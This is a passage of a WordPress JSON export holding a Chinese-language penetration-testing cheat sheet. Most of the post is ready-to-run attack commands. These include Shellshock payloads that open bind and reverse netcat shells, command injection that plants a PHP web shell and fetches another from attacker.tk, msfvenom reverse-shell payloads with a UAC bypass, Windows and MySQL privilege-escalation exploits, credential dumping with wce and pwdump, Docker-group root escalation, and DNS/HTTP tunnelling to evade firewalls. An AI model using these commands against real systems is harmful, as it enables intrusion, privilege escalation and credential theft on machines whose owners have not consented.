\u662f\u4e00\u6b3e\u5229\u7528Google\u6536\u96c6\u4fe1\u606f\u7684\u5de5\u5177\u3002<\/p>\n\n\n<pre class=\"wp-block-preformatted\"># http:\/\/www.edge-security.com\/metagoofil.php# \u5b83\u53ef\u4ee5\u81ea\u52a8\u5728\u641c\u7d20\u5f15\u64ce\u4e2d\u68c0\u7d22\u548c\u5206\u6790\u6587\u4ef6\uff0c\u8fd8\u5177\u6709\u63d0\u4f9bMac\u5730\u5740\uff0c\u7528\u6237\u540d\u5217\u8868\u7b49\u5176\u4ed6\u529f\u80fd$ python metagoofil.py&nbsp;-d example.com&nbsp;-t doc,pdf&nbsp;-l&nbsp;200&nbsp;-n&nbsp;50&nbsp;-o examplefiles&nbsp;-f results.html<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u5229\u7528 Shellshock<\/h3>\n\n\n<pre class=\"wp-block-preformatted\"># \u4e00\u4e2a\u53d1\u73b0\u5e76\u5229\u7528\u670d\u52a1\u5668 Shellshock \u7684\u5de5\u5177# https:\/\/github.com\/nccgroup\/shocker$&nbsp;.\/shocker.py&nbsp;-H&nbsp;192.168.56.118&nbsp;--command&nbsp;\"\/bin\/cat \/etc\/passwd\"&nbsp;-c&nbsp;\/cgi-bin\/status&nbsp;--verbose&nbsp;# \u67e5\u770b\u6587\u4ef6$ echo-e\"HEAD \/cgi-bin\/status HTTP\/1.1rnUser-Agent: () { :;}; echo $(&amp;lt;\/etc\/passwd)rnHost: vulnerablernConnection: closernrn\"&nbsp;|&nbsp;nc&nbsp;192.168.56.118&nbsp;80&nbsp;# \u7ed1\u5b9a shell$ echo-e\"HEAD \/cgi-bin\/status HTTP\/1.1rnUser-Agent: () { :;}; \/usr\/bin\/nc -l -p 9999 -e \/bin\/shrnHost: vulnerablernConnection: closernrn\"&nbsp;|&nbsp;nc&nbsp;192.168.56.118&nbsp;80&nbsp;# \u53cd\u5f39 Shell$ nc&nbsp;-l&nbsp;-p&nbsp;443$ echo\"HEAD \/cgi-bin\/status HTTP\/1.1rnUser-Agent: () { :;}; \/usr\/bin\/nc 192.168.56.103 443 -e \/bin\/shrnHost: vulnerablernConnection: closernrn\"&nbsp;|&nbsp;nc&nbsp;192.168.56.118&nbsp;80<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u83b7\u53d6 Docker \u7684 Root<\/h3>\n\n\n<pre class=\"wp-block-preformatted\"># \u83b7\u53d6 Docker \u7684 Root# user \u5fc5\u987b\u5728 docker \u7528\u6237\u7ec4\u4e2dek@victum:~\/docker-test$ iduid=1001(ek)&nbsp;gid=1001(ek)&nbsp;groups=1001(ek),114(docker)&nbsp;ek@victum:~$ mkdir docker-testek@victum:~$ cd docker-test&nbsp;ek@victum:~$ cat&nbsp;&amp;gt;&nbsp;DockerfileFROM debian:wheezy&nbsp;ENV WORKDIR&nbsp;\/stuff&nbsp;RUN mkdir&nbsp;-p $WORKDIR&nbsp;VOLUME&nbsp;[&nbsp;$WORKDIR&nbsp;]&nbsp;WORKDIR $WORKDIR&amp;lt;&amp;lt;&nbsp;EOF&nbsp;ek@victum:~$ docker build&nbsp;-t&nbsp;my-docker-image&nbsp;.ek@victum:~$ docker run&nbsp;-v $PWD:\/stuff -t my-docker-image \/bin\/sh&nbsp;-c 'cp \/bin\/sh \/stuff &amp;amp;&amp;amp; chown root.root \/stuff\/sh &amp;amp;&amp;amp; chmod a+s \/stuff\/sh'.\/shwhoami# root&nbsp;ek@victum:~$ docker run&nbsp;-v&nbsp;\/etc:\/stuff -t my-docker-image \/bin\/sh&nbsp;-c&nbsp;'cat \/stuff\/shadow'<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u4f7f\u7528 DNS \u96a7\u9053\u7ed5\u8fc7\u9632\u706b\u5899<\/h3>\n\n\n<pre class=\"wp-block-preformatted\"># \u8ba9\u6570\u636e\u548c\u547d\u4ee4\u4f7f\u7528 DNS \u96a7\u9053\u4f20\u8f93\u4ee5\u7ed5\u8fc7\u9632\u706b\u5899\u7684\u68c0\u67e5# dnscat2 \u652f\u6301\u4ece\u76ee\u6807\u4e3b\u673a\u4e0a\u9762\u4e0a\u4f20\u548c\u4e0b\u8f7d\u547d\u4ee4\u6765\u83b7\u53d6\u6587\u4ef6\u3001\u6570\u636e\u548c\u7a0b\u5e8f# \u670d\u52a1\u5668 (\u653b\u51fb\u8005)$ apt-get&nbsp;update$ apt-get&nbsp;-y install ruby-dev git make g++$ gem install bundler$ git clone https:\/\/github.com\/iagox86\/dnscat2.git$ cd dnscat2\/server$ bundle install$ ruby&nbsp;.\/dnscat2.rbdnscat2&amp;gt;&nbsp;New&nbsp;session established:16059dnscat2&amp;gt;&nbsp;session&nbsp;-i&nbsp;16059# \u5ba2\u6237\u673a (\u76ee\u6807)# https:\/\/downloads.skullsecurity.org\/dnscat2\/# https:\/\/github.com\/lukebaggett\/dnscat2-powershell$ dnscat&nbsp;--host&nbsp;&amp;lt;dnscat server_ip&amp;gt;<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u7f16\u8bd1 Assemble \u4ee3\u7801<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">$ nasm&nbsp;-f elf32 simple32.asm&nbsp;-o simple32.o$ ld&nbsp;-m elf_i386 simple32.o simple32&nbsp;$ nasm&nbsp;-f elf64 simple.asm&nbsp;-o simple.o$ ld simple.o&nbsp;-o simple<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u4f7f\u7528\u975e\u4ea4\u4e92 Shell \u6253\u5165\u5185\u7f51<\/h3>\n\n\n<pre class=\"wp-block-preformatted\"># \u751f\u6210 shell \u4f7f\u7528\u7684 ssh \u5bc6\u94a5$ wget&nbsp;-O&nbsp;-&nbsp;-q&nbsp;\"http:\/\/domain.tk\/sh.php?cmd=whoami\"$ wget&nbsp;-O&nbsp;-&nbsp;-q&nbsp;\"http:\/\/domain.tk\/sh.php?cmd=ssh-keygen -f \/tmp\/id_rsa -N \"\" \"$ wget&nbsp;-O&nbsp;-&nbsp;-q&nbsp;\"http:\/\/domain.tk\/sh.php?cmd=cat \/tmp\/id_rsa\"# \u589e\u52a0\u7528\u6237 tempuser$ useradd&nbsp;-m tempuser$ mkdir&nbsp;\/home\/tempuser\/.ssh&nbsp;&amp;amp;&amp;amp;&nbsp;chmod&nbsp;700&nbsp;\/home\/tempuser\/.ssh$ wget&nbsp;-O&nbsp;-&nbsp;-q&nbsp;\"http:\/\/domain.tk\/sh.php?cmd=cat \/tmp\/id_rsa\"&nbsp;&amp;gt;&nbsp;\/home\/tempuser\/.ssh\/authorized_keys$ chmod&nbsp;700&nbsp;\/home\/tempuser\/.ssh\/authorized_keys$ chown&nbsp;-R tempuser:tempuser&nbsp;\/home\/tempuser\/.ssh&nbsp;# \u53cd\u5f39 ssh shell$ wget&nbsp;-O&nbsp;-&nbsp;-q&nbsp;\"http:\/\/domain.tk\/sh.php?cmd=ssh -i \/tmp\/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f tempuser@&amp;lt;attacker_ip&amp;gt;\"<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u5229\u7528 POST \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u83b7\u53d6 Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">attacker:~$ curl&nbsp;-i&nbsp;-s&nbsp;-k&nbsp;-X&nbsp;'POST'&nbsp;--data-binary $'IP=%3Bwhoami&amp;amp;submit=submit'&nbsp;'http:\/\/victum.tk\/command.php'&nbsp;attacker:~$ curl&nbsp;-i&nbsp;-s&nbsp;-k&nbsp;-X&nbsp;'POST'&nbsp;--data-binary $'IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&amp;amp;submit=submit'&nbsp;'http:\/\/victum.tk\/command.php'&nbsp;attacker:~$ curl http:\/\/victum.tk\/shell.php?cmd=id&nbsp;# \u5728\u670d\u52a1\u5668\u4e0a\u4e0b\u8f7d shell (phpshell.php)http:\/\/victum.tk\/shell.php?cmd=php%20-r%20%27file_put_contents%28%22phpshell.php%22,%20fopen%28%22http:\/\/attacker.tk\/phpshell.txt%22,%20%27r%27%29%29;%27# \u8fd0\u884c nc \u5e76\u6267\u884c phpshell.phpattacker:~$ nc -nvlp 1337<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u4ee5\u7ba1\u7406\u5458\u8eab\u4efd\u5728 Win7 \u4e0a\u53cd\u5f39\u5177\u6709\u7cfb\u7edf\u6743\u9650\u7684 Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">msfvenom&nbsp;\u2013p windows\/shell_reverse_tcp LHOST=192.168.56.102&nbsp;\u2013f exe&nbsp;&amp;gt;&nbsp;danger.exe&nbsp;# \u663e\u793a\u8d26\u6237\u914d\u7f6enet user&nbsp;&amp;lt;login&amp;gt;&nbsp;# Kali \u4e0a\u4e0b\u8f7d psexechttps:\/\/technet.microsoft.com\/en-us\/sysinternals\/bb897553.aspx&nbsp;# \u4f7f\u7528 powershell \u811a\u672c\u4e0a\u4f20 psexec.exe \u5230\u76ee\u6807\u673a\u5668echo $client&nbsp;=&nbsp;New-Object&nbsp;System.Net.WebClient&nbsp;&amp;gt;&nbsp;script.ps1echo $targetlocation&nbsp;=&nbsp;\"http:\/\/192.168.56.102\/PsExec.exe\"&amp;gt;&amp;gt;&nbsp;script.ps1echo $client.DownloadFile($targetlocation,\"psexec.exe\")&nbsp;&amp;gt;&amp;gt;&nbsp;script.ps1powershell.exe&nbsp;-ExecutionPolicy&nbsp;Bypass&nbsp;-NonInteractive&nbsp;-File&nbsp;script.ps1&nbsp;# \u4f7f\u7528 powershell \u811a\u672c\u4e0a\u4f20 danger.exe \u5230\u76ee\u6807\u673a\u5668echo $client&nbsp;=&nbsp;New-Object&nbsp;System.Net.WebClient&nbsp;&amp;gt;&nbsp;script2.ps1echo $targetlocation&nbsp;=&nbsp;\"http:\/\/192.168.56.102\/danger.exe\"&amp;gt;&amp;gt;&nbsp;script2.ps1echo $client.DownloadFile($targetlocation,\"danger.exe\")&nbsp;&amp;gt;&amp;gt;&nbsp;script2.ps1powershell.exe&nbsp;-ExecutionPolicy&nbsp;Bypass&nbsp;-NonInteractive&nbsp;-File&nbsp;script2.ps1&nbsp;# \u4f7f\u7528\u9884\u7f16\u8bd1\u7684\u4e8c\u8fdb\u5236\u6587\u4ef6\u7ed5\u8fc7 UAC:https:\/\/github.com\/hfiref0x\/UACME&nbsp;# \u4f7f\u7528 powershell \u811a\u672c\u4e0a\u4f20 https:\/\/github.com\/hfiref0x\/UACME\/blob\/master\/Compiled\/Akagi64.exe \u5230\u76ee\u6807\u673a\u5668echo $client&nbsp;=&nbsp;New-Object&nbsp;System.Net.WebClient&nbsp;&amp;gt;&nbsp;script2.ps1echo $targetlocation&nbsp;=&nbsp;\"http:\/\/192.168.56.102\/Akagi64.exe\"&amp;gt;&amp;gt;&nbsp;script3.ps1echo $client.DownloadFile($targetlocation,\"Akagi64.exe\")&nbsp;&amp;gt;&amp;gt;&nbsp;script3.ps1powershell.exe&nbsp;-ExecutionPolicy&nbsp;Bypass&nbsp;-NonInteractive&nbsp;-File&nbsp;script3.ps1&nbsp;# \u5728 Kali \u4e0a\u521b\u5efa\u76d1\u542cnc&nbsp;-lvp&nbsp;4444# \u4ee5\u7cfb\u7edf\u6743\u9650\u4f7f\u7528 Akagi64 \u8fd0\u884c danger.exeAkagi64.exe&nbsp;1C:UsersUserDesktopdanger.exe&nbsp;# \u5728 Kali \u4e0a\u521b\u5efa\u76d1\u542cnc&nbsp;-lvp&nbsp;4444# \u4e0b\u4e00\u6b65\u5c31\u4f1a\u53cd\u5f39\u7ed9\u6211\u4eec\u4e00\u4e2a\u63d0\u8fc7\u6743\u7684 shell# \u4ee5\u7cfb\u7edf\u6743\u9650\u4f7f\u7528 PsExec \u8fd0\u884c danger.exepsexec.exe&nbsp;\u2013i&nbsp;\u2013d&nbsp;\u2013accepteula&nbsp;\u2013s danger.exe<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u4ee5\u666e\u901a\u7528\u6237\u8eab\u4efd\u5728 Win7 \u4e0a\u53cd\u5f39\u5177\u6709\u7cfb\u7edf\u6743\u9650\u7684 Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">https:\/\/technet.microsoft.com\/en-us\/security\/bulletin\/dn602597.aspx #ms15-051https:\/\/www.fireeye.com\/blog\/threat-research\/2015\/04\/probable_apt28_useo.html&nbsp;https:\/\/www.exploit-db.com\/exploits\/37049\/# \u67e5\u627e\u76ee\u6807\u673a\u5668\u662f\u5426\u5b89\u88c5\u4e86\u8865\u4e01\uff0c\u8f93\u5165\u5982\u4e0b\u547d\u4ee4wmic qfe&nbsp;getwmic qfe&nbsp;|&nbsp;find&nbsp;\"3057191\"# \u4e0a\u4f20\u7f16\u8bd1\u540e\u7684\u5229\u7528\u7a0b\u5e8f\u5e76\u8fd0\u884c\u5b83https:\/\/github.com\/hfiref0x\/CVE-2015-1701\/raw\/master\/Compiled\/Taihou64.exe# \u9ed8\u8ba4\u60c5\u51b5\u4e0b\u5176\u4f1a\u4ee5\u7cfb\u7edf\u6743\u9650\u6267\u884c cmd.exe\uff0c\u4f46\u6211\u4eec\u9700\u8981\u6539\u53d8\u6e90\u4ee3\u7801\u4ee5\u8fd0\u884c\u6211\u4eec\u4e0a\u4f20\u7684 danger.exe# https:\/\/github.com\/hfiref0x\/CVE-2015-1701 \u4e0b\u8f7d\u5b83\u5e76\u5b9a\u4f4d\u5230 \"main.c\"# \u4f7f\u7528 wce.exe \u83b7\u53d6\u5df2\u767b\u5f55\u7528\u6237\u7684\u660e\u6587\u8d26\u53f7\u5bc6\u7801http:\/\/www.ampliasecurity.com\/research\/windows-credentials-editor\/&nbsp;wce&nbsp;-w&nbsp;# \u4f7f\u7528 pwdump7 \u83b7\u53d6\u5176\u4ed6\u7528\u6237\u7684\u5bc6\u7801\u54c8\u5e0c\u503chttp:\/\/www.heise.de\/download\/pwdump.html# we can try online hash cracking tools such crackstation.net<\/pre>\n\n\n<h3 class=\"wp-block-heading\">MS08-067 \u2013 \u4e0d\u4f7f\u7528 Metasploit<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">$ nmap&nbsp;-v&nbsp;-p&nbsp;139,&nbsp;445&nbsp;--script=smb-check-vulns&nbsp;--script-args=unsafe=1192.168.31.205$ searchsploit ms08-067$ python&nbsp;\/usr\/share\/exploitdb\/platforms\/windows\/remote\/7132.py&nbsp;192.168.31.2051<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u901a\u8fc7 MySQL Root \u8d26\u6237\u5b9e\u73b0\u63d0\u6743<\/h3>\n\n\n<pre class=\"wp-block-preformatted\"># Mysql Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)$ wget&nbsp;0xdeadbeef.info\/exploits\/raptor_udf2.c$ gcc&nbsp;-g&nbsp;-c raptor_udf2.c$ gcc&nbsp;-g&nbsp;-shared&nbsp;-Wl,-soname,raptor_udf2.so&nbsp;-o raptor_udf2.so raptor_udf2.o&nbsp;-lcmysql&nbsp;-u root&nbsp;-pmysql&amp;gt;&nbsp;use&nbsp;mysql;mysql&amp;gt;&nbsp;create table foo(line blob);mysql&amp;gt;&nbsp;insert&nbsp;into&nbsp;foo values(load_file('\/home\/user\/raptor_udf2.so'));mysql&amp;gt;&nbsp;select&nbsp;*&nbsp;from&nbsp;foo&nbsp;into&nbsp;dumpfile&nbsp;'\/usr\/lib\/mysql\/plugin\/raptor_udf2.so';mysql&amp;gt;&nbsp;create&nbsp;function&nbsp;do_system returns integer soname&nbsp;'raptor_udf2.so';mysql&amp;gt;&nbsp;select&nbsp;*&nbsp;from&nbsp;mysql.func;mysql&amp;gt;&nbsp;selectdo_system('echo \"root:passwd\" | chpasswd &amp;gt; \/tmp\/out; chown user:user \/tmp\/out');&nbsp;user:~$ su&nbsp;-Password:user:~#&nbsp;whoamirootroot:~#&nbsp;iduid=0(root)&nbsp;gid=0(root)&nbsp;groups=0(root)<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u4f7f\u7528 LD_PRELOAD \u6ce8\u5165\u7a0b\u5e8f<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">$ wget https:\/\/github.com\/jivoi\/pentest\/ldpreload_shell.c$ gcc&nbsp;-shared&nbsp;-fPIC ldpreload_shell.c&nbsp;-o ldpreload_shell.so$ sudo&nbsp;-u user LD_PRELOAD=\/tmp\/ldpreload_shell.so&nbsp;\/usr\/local\/bin\/somesoft<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u9488\u5bf9 OpenSSH \u7528\u6237\u8fdb\u884c\u679a\u4e3e\u65f6\u5e8f\u653b\u51fb<\/h3>\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\uff1a\u679a\u4e3e\u65f6\u5e8f\u653b\u51fb(\u201cEnumeration Timing Attack\u201d)\u5c5e\u4e8e\u4fa7\u4fe1\u9053\u653b\u51fb\/\u65c1\u8def\u653b\u51fb(Side Channel Attack)\uff0c\u4fa7\u4fe1\u9053\u653b\u51fb\u662f\u6307\u5229\u7528\u4fe1\u9053\u5916\u7684\u4fe1\u606f\uff0c\u6bd4\u5982\u52a0\u89e3\u5bc6\u7684\u901f\u5ea6\/\u52a0\u89e3\u5bc6\u65f6\u82af\u7247\u5f15\u811a\u7684\u7535\u538b\/\u5bc6\u6587\u4f20\u8f93\u7684\u6d41\u91cf\u548c\u9014\u5f84\u7b49\u8fdb\u884c\u653b\u51fb\u7684\u65b9\u5f0f\uff0c\u4e00\u4e2a\u8bcd\u5f62\u5bb9\u5c31\u662f\u201c\u65c1\u6572\u4fa7\u51fb\u201d\u3002\u2013\u53c2\u8003\u81ea&nbsp;<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.tiejiang.org\/goto\/ab4w\" rel=\"noreferrer noopener\" rel=\"nofollow\" >shotgun<\/a>&nbsp;\u5728\u77e5\u4e4e\u4e0a\u7684\u89e3\u91ca\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">osueta \u662f\u4e00\u4e2a\u7528\u4e8e\u5bf9 OpenSSH \u8fdb\u884c\u65f6\u5e8f\u653b\u51fb\u7684 python2 \u811a\u672c\uff0c\u5176\u53ef\u4ee5\u5229\u7528\u65f6\u5e8f\u653b\u51fb\u679a\u4e3e OpenSSH \u7528\u6237\u540d\uff0c\u5e76\u5728\u4e00\u5b9a\u6761\u4ef6\u4e0b\u53ef\u4ee5\u5bf9 OpenSSH \u670d\u52a1\u5668\u8fdb\u884c DOS \u653b\u51fb\u3002<\/p>\n\n\n<pre class=\"wp-block-preformatted\"># https:\/\/github.com\/c0r3dump3d\/osueta$&nbsp;.\/osueta.py&nbsp;-H&nbsp;192.168.1.6&nbsp;-p&nbsp;22&nbsp;-U root&nbsp;-d&nbsp;30&nbsp;-v yes$&nbsp;.\/osueta.py&nbsp;-H&nbsp;192.168.10.22&nbsp;-p&nbsp;22&nbsp;-d&nbsp;15&nbsp;-v yes&nbsp;\u2013dos&nbsp;no&nbsp;-L userfile.txt<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u4f7f\u7528 ReDuh \u6784\u9020\u5408\u6cd5\u7684 HTTP \u8bf7\u6c42\u4ee5\u5efa\u7acb TCP \u901a\u9053<\/h3>\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\uff1a ReDuh \u662f\u4e00\u4e2a\u901a\u8fc7 HTTP \u534f\u8bae\u5efa\u7acb\u96a7\u9053\u4f20\u8f93\u5404\u79cd\u5176\u4ed6\u6570\u636e\u7684\u5de5\u5177\u3002\u5176\u53ef\u4ee5\u628a\u5185\u7f51\u670d\u52a1\u5668\u7684\u7aef\u53e3\u901a\u8fc7 http\/https \u96a7\u9053\u8f6c\u53d1\u5230\u672c\u673a\uff0c\u5f62\u6210\u4e00\u4e2a\u8fde\u901a\u56de\u8def\u3002\u7528\u4e8e\u76ee\u6807\u670d\u52a1\u5668\u5728\u5185\u7f51\u6216\u505a\u4e86\u7aef\u53e3\u7b56\u7565\u7684\u60c5\u51b5\u4e0b\u8fde\u63a5\u76ee\u6807\u670d\u52a1\u5668\u5185\u90e8\u5f00\u653e\u7aef\u53e3\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5bf9\u4e86\u4eb2\uff5eReDuh-Gui \u53f7\u79f0\u7aef\u53e3\u8f6c\u53d1\u795e\u5668\u54e6\u3002<\/p>\n\n\n<pre class=\"wp-block-preformatted\"># https:\/\/github.com\/sensepost\/reDuh# \u6b65\u9aa4 1# \u4e0a\u4f20 reDuh.jsp \u76ee\u6807\u670d\u52a1\u5668$ http:\/\/192.168.10.50\/uploads\/reDuh.jsp# \u6b65\u9aa4 2# \u5728\u672c\u673a\u8fd0\u884c reDuhClient$ java&nbsp;-jar reDuhClient.jar http:\/\/192.168.10.50\/uploads\/reDuh.jsp# \u6b65\u9aa4 3# \u4f7f\u7528 nc \u8fde\u63a5\u7ba1\u7406\u7aef\u53e3$ nc&nbsp;-nvv&nbsp;127.0.0.11010# \u6b65\u9aa4 4# \u4f7f\u7528\u96a7\u9053\u8f6c\u53d1\u672c\u5730\u7aef\u53e3\u5230\u8fdc\u7a0b\u76ee\u6807\u7aef\u53e3[createTunnel]&nbsp;7777:172.16.0.4:3389# \u6b65\u9aa4 5# \u4f7f\u7528 RDP \u8fde\u63a5\u8fdc\u7a0b$&nbsp;\/usr\/bin\/rdesktop&nbsp;-g&nbsp;1024x768&nbsp;-P&nbsp;-z&nbsp;-x l&nbsp;-k en-us&nbsp;-r sound:off localhost:7777<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Nmap\u626b\u63cf\u539f\u7406\u4e0e\u7528\u6cd5\uff1ahttp:\/\/blog.csdn.net\/aspirationflow\/article [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[14,1],"tags":[353],"class_list":["post-39","post","type-post","status-publish","format-standard","hentry","category-linux","category-net-security","tag-linux"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/39","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/39\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=39"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}